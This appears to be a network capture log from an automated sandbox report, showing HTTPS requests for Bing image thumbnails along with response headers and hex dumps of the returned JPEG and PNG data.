2024-11-23 06:09:26 UTC	346	OUT	GET /th?id=OADD2.10239357296561_1OO0GI7LQYW9WHHBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:26 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 669559 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: D9A454A4335049BB92BA1852815A8D5F Ref B: EWR30EDGE1606 Ref C: 2024-11-23T06:09:26Z Date: Sat, 23 Nov 2024 06:09:25 GMT Connection: close
2024-11-23 06:09:26 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 32 32 3a 34 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:22:438C
2024-11-23 06:09:26 UTC	16384	IN	Data Raw: ba ba 30 bf da 27 dc ff 00 f7 c6 df f6 a9 cd 7f ae ea 17 16 0f 05 f4 31 7d ab fd 57 ee 36 c5 02 af fc b4 ff 00 71 6b f2 1f 7e 16 85 3b 72 ae ad 7d f6 ff 00 82 54 b9 24 72 3f 13 2e 35 1d 0b c1 b0 db e8 f6 fa 9d cf 87 7e d4 f2 0b 9b e9 7f 75 22 fd d7 48 7e ed 73 1e 09 37 da b7 8b a6 d6 7c 2d a6 69 d6 36 ba 44 6f 34 b1 5d 9f 3a 1b 58 bf b8 77 7c d3 0a f5 cf 11 e9 fe 19 8b 4d 96 4f 12 18 75 2d 5e 28 92 39 65 8a 17 76 da df 76 3f fe 29 eb cb be 2c 6b 9a 8e bb a3 8d 3f 48 9b cb d3 f4 c3 e5 db 5a da cd fd ef fa 67 f7 eb dd cb 71 4a ac 7d 94 61 eb 27 b7 fc 13 19 2e 53 3f c3 f1 f8 63 53 9e 3d 32 c2 f6 ef f7 72 7d a2 5b 9b ad 39 1e 29 a5 64 c3 7c 9f f2 cd 7f b9 59 9e 25 b1 b6 f0 e5 bd fd b3 c1 a3 5f 26 a7 14 7e 54 d1 7c ef 6b b4 ff 00 cb 2f f7 bb d5 4d 50 69 70 df Data Ascii: 0'1}W6qk~;r}T$r?.5~u"H~s7\|-i6Do4]:Xw\|MOu-^(9evv?),k?HZgqJ}a'.S?cS=2r}[9)d\|Y%_&~T\|k/MPip
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: c4 29 5e 6b cf 36 c2 cb ec d6 92 ec f3 64 8b fd 4e ff 00 f6 13 f8 2b ad d2 b5 bd 1b ec f6 b0 5e 79 f2 49 7d fe ba 28 be e6 d5 ff 00 96 95 e5 e2 68 38 ca 35 e1 7b f6 24 a7 e1 98 b5 1f 08 5f 7f 6d cd 35 9c 72 5d 4b e5 f9 71 7c f1 5a 7c ff 00 73 e5 fb df ee d6 5e bd f1 27 5e b6 d4 ed a3 4b d3 34 f6 12 fe f4 c9 fe a6 7f f8 0d 74 3e 21 d3 3c 3b ac dc 46 91 5e 6a 3e 5d b8 fd ef 96 32 fb 87 de f3 3f 8a b3 3c 45 e0 ad 17 54 bc 96 0d 02 6f b2 dd 47 12 49 15 b4 d3 7d cf ff 00 6a b5 a7 88 c3 d4 9f 36 26 3a bf 2d 82 16 be a6 b5 9e b1 e2 2d 7b 50 8e fa c2 f6 28 ac 64 8f fd 27 4c 90 fc c8 3f e5 a7 96 1f ef d6 c6 b1 2f d9 bc af b0 79 df 67 8a 29 3c db 0f e0 f9 fe 6f b9 fe cd 79 dc fe 14 f1 1c 17 51 6a da 7e b5 0d f5 d5 b7 fa b8 e3 9b 6d c2 2a ff 00 b0 de 95 d1 78 0a fe Data Ascii: )^k6dN+^yI}(h85{$_m5r]Kq\|Z\|s^'^K4t>!<;F^j>]2?<EToGI}j6&:--{P(d'L?/yg)<oyQj~m*x
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: 5c f1 46 ff 00 dd c9 07 fc f3 f2 a5 87 fb 9f f3 cd b7 51 0a 98 98 4e dc bf 32 75 0b 77 fb 04 3f 63 d2 f4 ab 29 64 8b fd 6f ee 7e 7a b3 a7 cb 6d e4 c5 25 c6 95 f6 5b 7f f5 91 4b 17 f7 3f da ff 00 e2 6a 4d 1f 57 b6 d4 a1 fb 1f d8 7c ab 79 76 7f a7 fd cf f7 2b 95 d4 bf b6 6e 66 9a cf 4c f2 7e cf 14 af 24 b2 f9 df 24 8d 58 42 0e b4 e5 19 68 c4 75 56 7a 65 cc d0 cd 6f 25 8d 9d fe 8f 2c a9 24 5f be d9 f2 d6 56 9b a5 e9 d6 fe 6f d9 2f a6 f2 e1 91 e4 ff 00 4a 87 65 bc 08 ff 00 7b ee f3 49 e1 3b dd 56 da f3 fb 3f 58 b2 ff 00 43 ba 8b f7 be 6f fc b4 ff 00 ae 74 6a ba 56 8c 66 ff 00 44 83 cb b8 8a eb f7 b1 79 db d3 77 ff 00 65 de 8f 7e 12 94 25 2f b8 3d a1 ad e2 0d 33 55 b9 bc 8a 4d 2e 7d 33 cc 8a 2f de c5 0f fc f5 fe 15 ff 00 76 bb 8f 81 1f 12 bc 69 f0 af c3 f2 dd Data Ascii: \FQN2uw?c)do~zm%[K?jMW\|yv+nfL~$$XBhuVzeo%,$_Vo/Je{I;V?XCotjVfDywe~%/=3UM.}3/vi
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: ff 00 4e fb 4d f4 11 df 45 e7 6c fb 43 b2 7c 9f fd 95 12 58 ea 36 37 9f 61 3a 2d e5 cc 9f 6a 4b 7b 9d 4e 5d fb 3c d6 ff 00 c7 be ed 69 f8 a3 53 f0 d7 88 35 6f ec 7d 3f 4c fb 54 76 bf bb f3 7e c7 f3 cf 2c 68 cf f2 cc bb 5b e6 8f e5 f9 ab ce a5 15 09 45 c5 5d 75 68 5f 11 63 49 d1 6c ec 2f 2e e6 bc b2 b3 8a f2 c6 57 92 5f 2a f1 36 5a 6e fe 28 62 4f 95 9c 57 05 e2 8d 63 55 b1 f2 f4 7b 5f 3a 5b 08 a5 7b 8f dd 43 fc 35 a9 f0 76 e6 7d 76 6b 9d 5f 52 b8 fe c9 7d 4e fb ec f6 5e 68 ff 00 47 1f 2f cb f2 7f b3 55 7c 7a d2 43 7b 1e af 7f 7b f6 1b 0b e9 64 97 ec 23 fe 59 cb fe 7e 65 ae 8a 34 9d 3c 5c a9 d5 7c cf f5 f2 1c cd df 08 78 93 4a f1 4e 97 2c 17 16 3e 54 91 dd 43 71 2d ac b3 7e e7 e6 f9 7e e3 f2 fb 6b 9f 3f 0a bc 49 15 90 b8 b7 fb 1f 96 2e 5f cb b5 ba bc f9 d1 Data Ascii: NMElC\|X67a:-jK{N]<iS5o}?LTv~,h[E]uh_cIl/.W_*6Zn(bOWcU{_:[{C5v}vk_R}N^hG/U\|zC{{d#Y~e4<\\|xJN,>TCq-~~k?I._
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: ab e4 f1 38 8c 4e 0a a4 b1 d4 e5 ee b7 f0 f7 e9 77 e7 fd 79 0e 33 89 e3 ff 00 06 fc 07 3d f2 dc 8f 89 1a 9e b1 e1 bd 27 50 87 ed 36 17 52 ed 89 26 b8 db fb b9 24 df f3 79 7f bc fb eb eb 5e 6f a5 da 9d 33 c4 e6 1b bf 27 cb 86 e1 e0 8e 5f f5 96 fe 70 ff 00 6b fb b5 f6 24 5a e7 83 85 ae b1 14 e3 47 b9 b1 ba 96 7f 33 cc df f6 59 db fe 9a 6f 63 b2 36 6f 2f e7 f9 76 37 fb 35 e0 3f b4 e7 85 a5 49 ff 00 e1 2b b2 36 76 d6 1a 95 f4 fe 4d 8f ee 62 b8 0a bf c5 34 29 fc 5f f0 1a db 29 ce e5 8b c4 ca 15 a3 c9 cd a2 ec 25 1d 4c 8f 89 de 07 b3 b3 b2 fe d4 b2 30 c7 f6 98 a1 96 5b 58 be ec 0c ce d1 fc 9f de 4d f5 85 ac 43 71 a3 68 bf d9 b3 08 bc f8 a5 78 ee a2 b9 87 77 90 db 7e f2 d6 7d a8 bf b3 98 e8 3a bc 17 b6 d7 70 c9 fb ab 5b a8 7f d5 ff 00 16 cd 8d f3 2e ec 8a fa 17 Data Ascii: 8Nwy3='P6R&$y^o3'_pk$ZG3Yoc6o/v75?I+6vMb4)_)%L0[XMCqhxw~}:p[.
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: 62 3d 32 d6 ea e6 3d 2b 5b d2 6e a7 77 4b 29 f3 e6 79 91 5d c8 bf ea f8 ff 00 f5 ee a8 7e 1d 0f 89 9e 31 f0 7f 88 bc 2b e3 6b 9d 4b 50 b1 ba 96 ca ca 69 3c d8 6e 31 14 57 3e 6e cb 67 df b5 26 fe e7 ca cb b3 7d 7c 9e 16 a2 c2 5b 11 84 af cb 0d a7 19 ef eb 6f c7 73 4d be 23 c4 ee bc 23 e3 3b 7f 06 dc 9d 4a de 6b 6d 22 c7 53 7b 7c 4a 41 1f 6a 5d c1 95 3f f4 1c 8f 97 75 4b e0 4f 07 ea 1a be 93 63 e5 ea 57 b6 36 f7 37 d8 8c 45 68 f2 87 75 da 7e 5d 8d f3 b2 a7 cd f7 6b ea 6f 0f c7 e0 fb bf 0e eb 30 6a 3a 9d a5 83 79 37 5a 7d a5 b4 a2 28 5a d6 7d ae 97 11 f9 09 b9 52 49 7e 42 e8 9f 2b 7f ac 5a f1 2d 47 c5 de 1a f0 f6 a9 6d a9 f8 73 54 b8 fe d3 d3 04 69 6c 64 d3 7f b3 da d3 e5 f9 d5 7c bf bc 77 1f e2 fe 0a f5 30 f9 d6 23 13 ed 29 d3 a6 d3 4f b1 32 93 89 eb 1e 07 Data Ascii: b=2=+[nwK)y]~1+kKPi<n1W>ng&}\|[osM##;Jkm"S{\|JAj]?uKOcW67Ehu~]ko0j:y7Z}(Z}RI~B+Z-GmsTild\|w0#)O2
2024-11-23 06:09:27 UTC	16067	IN	Data Raw: 00 8f 8d cd ff 00 2d 11 ea 8f 8a 3c 6a 9a df 8a 86 a7 26 99 0c 51 c9 12 41 28 8b e4 f3 f6 e3 ef e3 ff 00 1e ac 9f 14 5c 5b 5c da e9 d2 5b 98 44 9e 5b c7 29 1d 7e ff 00 f1 7f 9f bb 58 50 6c f3 e2 32 7d ca c2 96 0a 84 a5 ed b9 6d 27 a1 5a 72 9f 4c fc 39 d0 93 c4 5e 00 f2 2e f5 bf b4 e9 f7 13 7d a2 d7 4b 8a 67 fb 6a 7f 7e e6 df fe b9 63 9a a7 a7 e8 b7 36 37 ba 3f 86 35 7d 26 f2 e1 a5 b6 9e 5b 0d 5e d3 63 fd aa 27 fd ec 7f ec 6d 2d 1f 2b f7 b6 d7 07 e1 8d 57 51 d1 fc 25 68 34 cd 52 f6 c6 e2 29 67 92 da fa 48 53 ec fb b6 7f cb 39 7e f2 bb 57 a9 f8 6f c4 9f f0 97 d8 ea be 11 d7 b5 49 bf b5 2e 0d ae a1 6b ae d8 de 3d bd bd dc aa ea 9f 3f fc b3 fa 4c db 1b fb ed 5f 2d 89 a1 5e 83 94 ef 78 5f e6 ba 5c 71 e4 91 e7 9e 0b b2 8e 7b d9 53 47 bb 8a d3 56 b1 91 ef 62 ba Data Ascii: -<j&QA(\[\[D[)~XPl2}m'ZrL9^.}Kgj~c67?5}&[^c'm-+WQ%h4R)gHS9~WoI.k=?L_-^x_\q{SGVb
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: fe 05 9a f9 bc 26 1a af d6 a5 2a 73 fd ea fb ad fd 7f 5b 0d 55 73 f4 38 3d 4a ce e3 4f be 92 ce f2 1f 2a 7b 69 5e 39 63 3d 99 6a 18 eb b0 f8 b1 af 2f 88 35 a5 bd ba d1 26 d3 b5 af f9 89 99 65 3b 66 27 1b 3f 76 df ea fe 5e b5 c6 d7 d9 51 94 e7 4e 2e 51 b3 ea 59 a0 a9 6f 16 9b 0d c4 9f bc fd eb c7 24 5e 75 5b 6f 10 5e d8 5e 47 fd 83 a8 ea 36 d6 b6 d2 f9 96 b1 cb 37 fa b6 fe 2e 9c 56 25 3a 34 91 ff 00 d5 ff 00 cb 2a af 67 09 7c 5a 81 77 5e d6 75 1d 6e f7 ed 9a a5 ec d7 57 1f f3 d6 5a bd e1 bd 28 ea 0d e7 c1 65 2d f4 96 ff 00 eb 6d 62 85 db 7c 4a 99 77 de bd 2b 22 59 64 9a 1f 2d ff 00 e5 95 7a 77 c2 5f 1a 69 5e 0e f0 f9 d4 2c 2f 2e e2 d4 09 7b 7b fd 30 01 24 3a 8c 46 17 11 cf f3 7f 12 bb fc c9 fd df c6 b9 b1 2e 74 e8 3f 63 1d 7a 21 74 37 35 cf 81 37 51 78 16 Data Ascii: &s[Us8=JO{i^9c=j/5&e;f'?v^QN.QYo$^u[o^^G67.V%:4*g\|Zw^unWZ(e-mb\|Jw+"Yd-zw_i^,/.{{0$:F.t?cz!t757Qx
2024-11-23 06:09:27 UTC	16384	IN	Data Raw: ba b9 d3 b7 cf f6 76 97 74 7b ff 00 d8 57 d8 ea ad d2 bb 2f 85 5e 37 b7 b5 f8 8d a6 44 7c 47 3e a5 69 1e a7 06 9e 2e ae 65 78 9e c6 03 17 ee bc bd bf 70 ee 73 1d 78 f8 dc bf 15 4a 4f 91 eb 05 e7 aa 7f a9 b4 27 09 53 f7 ba 98 ff 00 1d 3e 20 f8 1e ce 1b 6d 37 4a f1 06 ba d7 11 48 6e 22 16 10 7d 89 e0 5f e1 8a 57 f9 5b e6 dc fb b6 fc df 72 be 71 d7 e7 b1 bd d7 6e e6 d2 ec be c3 67 24 be 64 56 d2 4d e6 f9 2b ff 00 5d 0f de af 70 fd a3 3c 2d e1 8d 07 5e d6 b4 ff 00 0b 78 76 e2 fa ee d6 43 67 a9 dd 5f 5d cd 71 fd 94 77 f0 cf bb fd 53 e7 f8 bc c7 4e b5 e5 5e 1f d0 05 8f 89 92 0d 6f f7 5e 55 d7 d9 84 91 ca 8f e4 4f fc 3b 97 e6 de 95 f6 79 1f b0 a1 82 53 a5 cd 6b 7d ad df c8 e0 94 bd f3 23 58 d2 75 6d 37 4a b0 93 50 d2 e6 b5 83 53 8b ed 16 12 cb 17 fc 7c c7 f7 72 Data Ascii: vt{W/^7D\|G>i.expsxJO'S> m7JHn"}_W[rqng$dVM+]p<-^xvCg_]qwSN^o^UO;ySk}#Xum7JPS\|r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49757	2.16.158.90	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:26 UTC	367	OUT	GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive
2024-11-23 06:09:27 UTC	627	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Type: image/png Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Content-Length: 1874 Date: Sat, 23 Nov 2024 06:09:26 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.b79e1002.1732342166.30c2688
2024-11-23 06:09:27 UTC	1874	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 06 e7 49 44 41 54 48 4b 95 93 0b 54 93 e7 19 c7 3f 2e 81 90 1b b7 ba a3 67 dd 7a a6 75 a7 83 40 88 dc ca aa d4 1d 94 02 02 81 90 ac 5e d0 8e e3 8e 5d 2f 93 22 0c 08 01 af 08 a2 a0 20 a2 50 44 ec 9c 73 dd d9 dc ea ac 68 5b 35 17 92 70 27 5c 12 12 42 a2 dc aa 88 a8 79 9f 8f 90 48 4b f6 26 fb 8e eb d6 d9 6d bf 73 fe e7 3b 39 e7 7d fe bf ef 79 bf 13 e2 bb 58 ad 34 ae e4 ca 47 8b b9 72 e3 17 5c b9 6e 3c 44 31 f0 24 44 d9 83 a3 9a 0c 51 de 54 87 2a db 8e 87 2a ff b2 9e f8 a3 d8 8b 1a f9 df e0 7d 31 f1 fd 08 d9 Data Ascii: PNGIHDRw=sRGBgAMAapHYsodIDATHKT?.gzu@^]/" PDsh[5p'\ByHK&ms;9}yX4Gr\n<D1$DQT**}1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49758	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:26 UTC	375	OUT	GET /th?id=OADD2.10239370639595_1MX6CE6U5QJ1LNKB2&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:27 UTC	861	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 664170 Content-Type: image/jpeg Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 3311FE969BD1437B871AC574BB1CC47D Ref B: EWR30EDGE1410 Ref C: 2024-11-23T06:09:26Z Date: Sat, 23 Nov 2024 06:09:26 GMT Connection: close
2024-11-23 06:09:27 UTC	3517	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1b 42 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 31 39 3a 35 34 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``BExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:19:548
2024-11-23 06:09:27 UTC	8192	IN	Data Raw: 8f 89 f6 ec 86 fa 54 0b 83 0d 96 5a c7 30 12 e7 b5 f4 fa 74 be ed 9e fa ac ae df d1 ff 00 c6 29 74 7e 95 93 d4 6c bf 3b 12 bb 7e ce c2 da a8 b1 a5 ac 61 b9 ff 00 a3 63 6e f5 dc df 55 95 cf f3 35 ff 00 39 63 eb 42 58 81 37 b7 8d f1 0e 20 a1 39 89 08 d0 d7 a8 2f 47 4f 52 a6 bb bd 66 d4 5c c6 b9 a6 ca ce be dd b6 7b b7 37 f3 9a f5 9d d5 fa bd 5d 5b 11 d8 d6 56 cc 2c a6 bd be bd 8e 2e 73 22 bf 51 fb c5 ad ac bb d0 f4 fd 37 57 bb df fa 5f fa e2 87 48 7d 02 ac 9c 3c ee 9f 63 b3 e8 73 d9 65 6d 16 ed 2f 67 a6 c6 7e 9f 1e c6 ec 6b 1e fb 2d b1 9e 95 bf a2 f4 fd 1b 55 6e b3 76 25 97 52 dc 4c 6b 68 c9 35 fa 16 63 07 3d ee 39 1b de da db 53 9d ef 7b 6e af 66 ca dd f4 3f eb 68 c7 18 e2 d4 1e 21 55 5f 82 f3 f2 df 7b f2 74 87 50 c1 a0 55 56 41 73 98 2b 6b 6b b1 a2 49 6b Data Ascii: TZ0t)t~l;~acnU59cBX7 9/GORf\{7][V,.s"Q7W_H}<csem/g~k-Unv%RLkh5c=9S{nf?h!U_{tPUVAs+kkIk
2024-11-23 06:09:27 UTC	4144	IN	Data Raw: 9f ee af dd ad a9 63 20 dd a4 73 d7 c0 4d ab c5 9c 43 a6 69 8c 80 55 cb cb 69 6d a6 68 e5 5d a5 78 a8 b6 d7 72 96 87 91 28 34 ec d1 59 96 9b b4 fe 15 65 92 9a d1 d5 73 13 ca 57 65 34 6d 35 63 cb a5 58 c0 a7 cc 83 94 ae b1 bf 7a 72 a6 2a 7d a0 53 1a 97 33 0e 54 33 cb a3 68 a7 52 e0 1e 68 b9 43 39 a6 b0 a9 36 8a 46 14 ee 04 4c 29 31 52 60 52 d1 70 b1 13 0a 46 06 a5 60 29 1a 8b 8a c4 3b 4f 7a 36 d4 8c 69 3a d3 0b 11 ed a4 c3 54 94 8d 8a 02 c4 4c 29 18 53 d8 8a 6b 11 4c 43 58 52 62 9f cd 36 98 0d a3 00 53 d5 40 a4 60 28 01 98 14 60 53 b0 29 28 01 31 49 4e e6 9b f3 74 a0 77 0a 3a 53 96 8c 2d 03 23 63 4c 63 4f 60 29 8c 28 13 18 e6 98 c2 a4 6f bd 4d 6a a2 04 e6 8a 36 d2 e0 0a 00 4e b4 9c d3 b2 05 37 3f 2d 05 09 4d e6 9c c4 d3 58 50 2b 8c 62 d4 c6 cf f1 54 8c 29 Data Ascii: c sMCiUimh]xr(4YesWe4m5cXzr*}S3T3hRhC96FL)1R`RpF`);Oz6i:TL)SkLCXRb6S@`(`S)(1INtw:S-#cLcO`)(oMj6N7?-MXP+bT)
2024-11-23 06:09:27 UTC	8192	IN	Data Raw: 47 69 34 72 05 e5 9b e6 ae da 35 a5 1d 22 ce 2a d4 61 3d 64 8e 5b 50 f0 f9 82 1f 32 37 e7 fb ad 58 ed 1e d6 da eb b4 d7 a3 3a c5 77 6f 91 d2 b9 af 14 59 46 16 3f b3 af 3b 8e ea ee c3 e2 5c 9f 2c 8f 33 15 81 8a 4e 70 39 f5 8f 3d 29 c2 2a 7d c5 b4 b1 b6 1d 7e f5 22 a3 d7 6d ee 79 bc ad 3b 34 0b 19 3d 69 ca 80 52 f9 64 f5 a7 2c 4d 52 55 84 55 c5 39 70 28 58 8d 39 23 a0 69 08 d8 a5 e2 9f b0 53 91 40 fe 1a 0a b0 c5 14 ab 52 a8 ff 00 66 9d b1 7f bb 40 d2 21 cd 3b 35 22 a2 0a 5d 80 d0 3b 11 64 d1 b9 c5 4d e5 ad 1b 05 2b 8c 89 59 e9 ea 5a 9f e5 8a 55 18 a2 e0 ae 37 9a 54 c0 5a 77 cb 46 53 b5 22 87 67 34 35 0a 8e cb c2 b5 0c ae 38 2b 4a e8 ab 3b 5e c1 96 a3 3e b4 d6 de 3a d2 31 a6 2b 8e 66 a4 eb 4d ce 68 e4 f4 a0 90 c8 14 99 14 30 ec 56 97 61 3c 85 a0 37 1b fc a8 Data Ascii: Gi4r5"a=d[P27X:woYF?;\,3Np9=)}~"my;4=iRd,MRUU9p(X9#iS@Rf@!;5"];dM+YZU7TZwFS"g458+J;^>:1+fMh0Va<7
2024-11-23 06:09:27 UTC	8192	IN	Data Raw: 56 ab 19 11 26 60 5a 8b 5f a0 b5 45 c6 9f e5 a8 64 94 9a 64 2c 92 c9 b3 76 df f6 aa d5 e5 b0 8e 1f 33 7f 1f de a5 a2 76 29 6a 54 eb cd 36 ab 3c a4 35 3d 66 f9 72 3a d6 b6 64 5d 12 b9 7e 94 df 22 47 e7 75 3a df e7 6e 6b 46 34 8d 56 a1 ca c3 4a e6 7c 76 e6 3e 7e f1 ab 96 f2 c8 ad 83 fc 34 f6 00 36 42 d2 a1 ef 49 ca fb 94 a2 91 22 dd ca ad 84 e9 57 6d 65 6d b8 7e b5 9c a0 bc 98 15 a1 1c 0e 17 71 6e 6b 29 d9 1a 46 f7 d0 93 cf 40 d5 72 c7 54 96 da 48 d8 7c cb fd d6 aa 0b 08 2d f2 d5 7b c9 44 72 6c ac f9 53 d0 b7 75 a9 b3 79 a8 25 d4 cc 77 6d 1f dd aa 32 4a 15 b8 6f fc 7a b3 9a 53 d4 53 7c c7 6e 9f c5 55 1a 76 25 ce e6 ce 93 71 2f f6 a4 44 37 f1 7c df 4a ec 1d 41 5d e3 a5 70 5a 57 99 e6 2f f0 d7 4a 97 72 c6 a9 f3 71 d3 e6 ae 7a f1 bb d0 de 8c ed 72 f5 c6 cd b9 Data Ascii: V&`Z_Edd,v3v)jT6<5=fr:d]~"Gu:nkF4VJ\|v>~46BI"Wmem~qnk)F@rTH\|-{DrlSuy%wm2JozSS\|nUv%q/D7\|JA]pZW/Jrqzr
2024-11-23 06:09:27 UTC	8192	IN	Data Raw: 57 3d 49 36 ec 8d e9 ab 2d 4a ef 20 3f 23 ad 31 a2 8c f0 17 96 fb b5 66 16 82 e3 a5 48 12 24 6c ee e6 b2 e6 b1 7c b7 2b 25 93 b7 df 5a a9 a8 5b f9 6d 91 d5 6b 7d 66 88 6d 1b 97 2c b5 52 fa 34 68 5b 3f 31 a2 15 1d f5 09 41 58 c5 b7 5f 32 6f 9f 75 17 10 95 92 ae c3 10 8d 77 9e b5 1c d2 2b 37 35 b2 93 be 86 5c ba 15 12 23 e7 2e 6a e2 00 ab c5 40 cc 3a d4 2d 3e 1a ab 56 2d 11 3d c4 7f c7 55 b6 93 49 25 c3 bf 07 a5 37 cd db 56 af 62 25 ab 24 44 53 d6 a4 4c 06 c0 aa e9 29 34 aa e4 37 2d 4d dc 94 91 af 66 40 ab f6 d3 01 b7 0d 58 90 cd 85 a2 ff 00 55 b2 d3 ad 7e d1 7f 73 05 b4 4b fc 52 b6 d5 ae 59 c6 e7 54 66 8e 9e 39 b3 f5 ab 49 31 f2 f0 6b ca b5 6f 8c 7e 09 d2 55 8f f6 84 97 72 46 b9 f2 ed a3 2c cd f4 ce 2a 86 9f fb 43 fc 3f bf 8d 7f d3 2e 60 1b b6 37 99 18 6d Data Ascii: W=I6-J ?#1fH$l\|+%Z[mk}fm,R4h[?1AX_2ouw+75\#.j@:->V-=UI%7Vb%$DSL)47-Mf@XU~sKRYTf9I1ko~UrF,*C?.`7m
